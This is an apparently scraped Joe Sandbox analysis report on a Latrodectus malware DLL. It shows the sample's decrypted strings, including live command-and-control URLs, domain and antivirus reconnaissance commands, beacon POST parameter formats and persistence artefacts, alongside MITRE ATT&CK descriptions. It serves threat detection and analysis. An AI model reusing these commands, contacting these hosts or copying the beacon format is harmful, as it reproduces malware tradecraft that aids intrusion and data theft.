Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 487500c56fc5baba734a0549efe86f8d265784918ff913f3653c454c65818df7
Instruction ID: 6ed749c758f842bfd95429bd2b7eeca9c021458c426f5b86800c2d3b18a00bcc
Opcode Fuzzy Hash: 487500c56fc5baba734a0549efe86f8d265784918ff913f3653c454c65818df7
Instruction Fuzzy Hash: 9C91F3F161DE86D9EA50DB20E4883FAA3E2FB84754F602035E58E42AA9DF3CD545C740

Function 00007FFB1C813A24 Relevance: 9.1, APIs: 6, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FFB1C813A6D

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 01bec8911bb4f9af00197d5f4fc03d1600d8605cb0f0ec9bee9f2296ad5b7041
Instruction ID: 643f1de5ea3033fb9b387c6882573495212395711b7a5b0b988652566cf32dab
Opcode Fuzzy Hash: 01bec8911bb4f9af00197d5f4fc03d1600d8605cb0f0ec9bee9f2296ad5b7041
Instruction Fuzzy Hash: DB512CB160CE41C6E6509B24F4983BAA7A2FB847B4F201235EA9D47BE8DF7CD445CB40

Function 00007FFB1C8114D8 Relevance: 7.7, APIs: 5, Instructions: 176processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FFB1C8114FA
Process32First.KERNEL32 ref: 00007FFB1C811548
wsprintfA.USER32 ref: 00007FFB1C811693
wsprintfA.USER32 ref: 00007FFB1C81172D
Process32Next.KERNEL32 ref: 00007FFB1C81184F

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 4137211488-0
Opcode ID: 122b4440f3820f507c9c7f722be5ef18d2b0d523ffa98e5bd68bd12a46e16220
Instruction ID: 35ddf32a9203877f86cace158fb8afb67d5f3004718057697168a249f7df91db
Opcode Fuzzy Hash: 122b4440f3820f507c9c7f722be5ef18d2b0d523ffa98e5bd68bd12a46e16220
Instruction Fuzzy Hash: C791E1F2A1DE82DADA60DB64E4842FAB3E6FB84350F601135D68D42B69DF3CD545CB40

Function 00007FFB1C818D90 Relevance: 7.6, APIs: 5, Instructions: 92networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FFB1C818DF7
InternetOpenUrlW.WININET ref: 00007FFB1C818E33
InternetCloseHandle.WININET ref: 00007FFB1C818F33
InternetCloseHandle.WININET ref: 00007FFB1C818F46

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen
String ID:
API String ID: 435140893-0
Opcode ID: c6d46565824af0f64668203f6a52407f04d2c0bf92a299b4f424fdf3a9ff470a
Instruction ID: 0975b5962a9f0a656cbf8d34362133103020a78d4eb9124f34698408092c89ab
Opcode Fuzzy Hash: c6d46565824af0f64668203f6a52407f04d2c0bf92a299b4f424fdf3a9ff470a
Instruction Fuzzy Hash: 6A41DAB6629A41CAE760CB25F09976AB3E2F785754F202025F78A47B58CF7DD844CB00

Function 00007FFB1C81B4CC Relevance: 7.6, APIs: 5, Instructions: 79processCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00007FFB1C81B59C
wsprintfW.USER32 ref: 00007FFB1C81B5EE
CreateProcessW.KERNEL32 ref: 00007FFB1C81B63D
CloseHandle.KERNEL32 ref: 00007FFB1C81B650
CloseHandle.KERNEL32 ref: 00007FFB1C81B65B

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandlewsprintf$CreateProcess
String ID:
API String ID: 2803068115-0
Opcode ID: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
Instruction ID: 48fb8f4b1721913af5da16f6dfdae5630c0aa755f90df2cb670c959ba85a1840
Opcode Fuzzy Hash: 8938f75853ead479109948e0102cad3cc37345a1e7db50e04927b10cccad6238
Instruction Fuzzy Hash: B941CBF2508E82D9EA60DF24E4883FAB7A2FB84354F605035D68D82A69DF7CD559CB40

Source: https://winarkamaps.com/q	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/live/comp	Avira URL Cloud: Label: phishing
Source: https://stratimasesstr.com/F	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/live/	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/live/al	Avira URL Cloud: Label: malware
Source: https://stratimasesstr.com/live/l	Avira URL Cloud: Label: phishing
Source: https://winarkamaps.com/%	Avira URL Cloud: Label: malware
Source: https://stratimasesstr.com/	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/m/=	Avira URL Cloud: Label: malware
Source: https://stratimasesstr.com/live/$	Avira URL Cloud: Label: phishing
Source: https://stratimasesstr.com/live/	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/	Avira URL Cloud: Label: malware
Source: https://winarkamaps.com/live/F	Avira URL Cloud: Label: malware

Source: winarkamaps.com	Virustotal: Detection: 20%	Perma Link
Source: stratimasesstr.com	Virustotal: Detection: 17%	Perma Link
Source: https://winarkamaps.com/live/	Virustotal: Detection: 18%	Perma Link
Source: https://stratimasesstr.com/	Virustotal: Detection: 17%	Perma Link
Source: https://winarkamaps.com/live/F	Virustotal: Detection: 17%	Perma Link
Source: https://winarkamaps.com/	Virustotal: Detection: 20%	Perma Link
Source: https://stratimasesstr.com/live/	Virustotal: Detection: 15%	Perma Link

Source: Malware configuration extractor	URLs: https://winarkamaps.com/live/
Source: Malware configuration extractor	URLs: https://stratimasesstr.com/live/

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: global traffic	DNS traffic detected: DNS query: winarkamaps.com
Source: global traffic	DNS traffic detected: DNS query: stratimasesstr.com

Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll	Virustotal: Detection: 79%			Perma Link

Source: r2iL9TLvO3.dll	String decryptor: /c ipconfig /all
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c systeminfo
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c nltest /domain_trusts
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c net view /all /domain
Source: r2iL9TLvO3.dll	String decryptor: /c nltest /domain_trusts /all_trusts
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c net view /all
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: &ipconfig=
Source: r2iL9TLvO3.dll	String decryptor: /c net group "Domain Admins" /domain
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\wbem\wmic.exe
Source: r2iL9TLvO3.dll	String decryptor: /c net config workstation
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: /c whoami /groups
Source: r2iL9TLvO3.dll	String decryptor: C:\Windows\System32\cmd.exe
Source: r2iL9TLvO3.dll	String decryptor: &systeminfo=
Source: r2iL9TLvO3.dll	String decryptor: &domain_trusts=
Source: r2iL9TLvO3.dll	String decryptor: &domain_trusts_all=
Source: r2iL9TLvO3.dll	String decryptor: &net_view_all_domain=
Source: r2iL9TLvO3.dll	String decryptor: &net_view_all=
Source: r2iL9TLvO3.dll	String decryptor: &net_group=
Source: r2iL9TLvO3.dll	String decryptor: &wmic=
Source: r2iL9TLvO3.dll	String decryptor: &net_config_ws=
Source: r2iL9TLvO3.dll	String decryptor: &net_wmic_av=
Source: r2iL9TLvO3.dll	String decryptor: &whoami_group=
Source: r2iL9TLvO3.dll	String decryptor: "pid":
Source: r2iL9TLvO3.dll	String decryptor: "%d",
Source: r2iL9TLvO3.dll	String decryptor: "proc":
Source: r2iL9TLvO3.dll	String decryptor: "%s",
Source: r2iL9TLvO3.dll	String decryptor: "subproc": [
Source: r2iL9TLvO3.dll	String decryptor: &proclist=[
Source: r2iL9TLvO3.dll	String decryptor: "pid":
Source: r2iL9TLvO3.dll	String decryptor: "%d",
Source: r2iL9TLvO3.dll	String decryptor: "proc":
Source: r2iL9TLvO3.dll	String decryptor: "%s",
Source: r2iL9TLvO3.dll	String decryptor: "subproc": [
Source: r2iL9TLvO3.dll	String decryptor: &desklinks=[
Source: r2iL9TLvO3.dll	String decryptor: .
Source: r2iL9TLvO3.dll	String decryptor: "%s"
Source: r2iL9TLvO3.dll	String decryptor: Update_%x
Source: r2iL9TLvO3.dll	String decryptor: Custom_update
Source: r2iL9TLvO3.dll	String decryptor: .dll
Source: r2iL9TLvO3.dll	String decryptor: .exe
Source: r2iL9TLvO3.dll	String decryptor: Updater
Source: r2iL9TLvO3.dll	String decryptor: "%s"
Source: r2iL9TLvO3.dll	String decryptor: rundll32.exe
Source: r2iL9TLvO3.dll	String decryptor: "%s", %s %s
Source: r2iL9TLvO3.dll	String decryptor: runnung
Source: r2iL9TLvO3.dll	String decryptor: :wtfbbq
Source: r2iL9TLvO3.dll	String decryptor: %d
Source: r2iL9TLvO3.dll	String decryptor: %s%s
Source: r2iL9TLvO3.dll	String decryptor: files/bp.dat
Source: r2iL9TLvO3.dll	String decryptor: %s\%d.dll
Source: r2iL9TLvO3.dll	String decryptor: %d.dat
Source: r2iL9TLvO3.dll	String decryptor: %s\%s
Source: r2iL9TLvO3.dll	String decryptor: init -zzzz="%s\%s"
Source: r2iL9TLvO3.dll	String decryptor: front
Source: r2iL9TLvO3.dll	String decryptor: /files/
Source: r2iL9TLvO3.dll	String decryptor: Facial
Source: r2iL9TLvO3.dll	String decryptor: .exe
Source: r2iL9TLvO3.dll	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: r2iL9TLvO3.dll	String decryptor: POST
Source: r2iL9TLvO3.dll	String decryptor: GET
Source: r2iL9TLvO3.dll	String decryptor: curl/7.88.1
Source: r2iL9TLvO3.dll	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: r2iL9TLvO3.dll	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: r2iL9TLvO3.dll	String decryptor: CLEARURL
Source: r2iL9TLvO3.dll	String decryptor: URLS
Source: r2iL9TLvO3.dll	String decryptor: COMMAND
Source: r2iL9TLvO3.dll	String decryptor: ERROR
Source: r2iL9TLvO3.dll	String decryptor: eNIHaXC815vAqddR21qsuD35eJFL7CnSOLI9vUBdcb5RPcS0h6
Source: r2iL9TLvO3.dll	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: r2iL9TLvO3.dll	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: r2iL9TLvO3.dll	String decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
Source: r2iL9TLvO3.dll	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
Source: r2iL9TLvO3.dll	String decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
Source: r2iL9TLvO3.dll	String decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Source: r2iL9TLvO3.dll	String decryptor: <html>
Source: r2iL9TLvO3.dll	String decryptor: <!DOCTYPE
Source: r2iL9TLvO3.dll	String decryptor: %s%d.dll
Source: r2iL9TLvO3.dll	String decryptor: 12345
Source: r2iL9TLvO3.dll	String decryptor: &stiller=
Source: r2iL9TLvO3.dll	String decryptor: %s%d.exe
Source: r2iL9TLvO3.dll	String decryptor: LogonTrigger
Source: r2iL9TLvO3.dll	String decryptor: %x%x
Source: r2iL9TLvO3.dll	String decryptor: TimeTrigger
Source: r2iL9TLvO3.dll	String decryptor: PT1H%02dM
Source: r2iL9TLvO3.dll	String decryptor: %04d-%02d-%02dT%02d:%02d:%02d
Source: r2iL9TLvO3.dll	String decryptor: &mac=
Source: r2iL9TLvO3.dll	String decryptor: %02x
Source: r2iL9TLvO3.dll	String decryptor: :%02x
Source: r2iL9TLvO3.dll	String decryptor: PT0S
Source: r2iL9TLvO3.dll	String decryptor: &computername=%s
Source: r2iL9TLvO3.dll	String decryptor: &domain=%s
Source: r2iL9TLvO3.dll	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: r2iL9TLvO3.dll	String decryptor: \*.dll
Source: r2iL9TLvO3.dll	String decryptor: %04X%04X%04X%04X%08X%04X
Source: r2iL9TLvO3.dll	String decryptor: %04X%04X%04X%04X%08X%04X
Source: r2iL9TLvO3.dll	String decryptor: \Registry\Machine\
Source: r2iL9TLvO3.dll	String decryptor: https://winarkamaps.com/live/
Source: r2iL9TLvO3.dll	String decryptor: https://stratimasesstr.com/live/
Source: r2iL9TLvO3.dll	String decryptor: AppData
Source: r2iL9TLvO3.dll	String decryptor: Desktop
Source: r2iL9TLvO3.dll	String decryptor: Startup
Source: r2iL9TLvO3.dll	String decryptor: Personal
Source: r2iL9TLvO3.dll	String decryptor: Local AppData
Source: r2iL9TLvO3.dll	String decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: r2iL9TLvO3.dll	String decryptor: \update_data.dat
Source: r2iL9TLvO3.dll	String decryptor: URLS
Source: r2iL9TLvO3.dll	String decryptor: URLS\|%d\|%s

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report r2iL9TLvO3.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Latrodectus

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Custom_update\Update_8c0cffeb.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
r2iL9TLvO3.dll

Function 00007FFB1E86463C Relevance: 15.3, APIs: 10, Instructions: 291
nativeCOMMON

Function 00007FFB1E867588 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
nativefileCOMMON

Function 00007FFB1E8677B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
filenativeCOMMON

Function 00007FFB1E868820 Relevance: 6.0, APIs: 4, Instructions: 28
processCOMMON

Function 00007FFB1E8668E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
COMMON

Function 00007FFB1E868AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Function 00007FFB1E86B1D4 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Function 00007FFB1E86A350 Relevance: 4.6, APIs: 3, Instructions: 67
COMMON

Function 00007FFB1E8633AC Relevance: 9.2, APIs: 6, Instructions: 163
COMMON

Function 00007FFB1E863A24 Relevance: 9.1, APIs: 6, Instructions: 110
fileCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre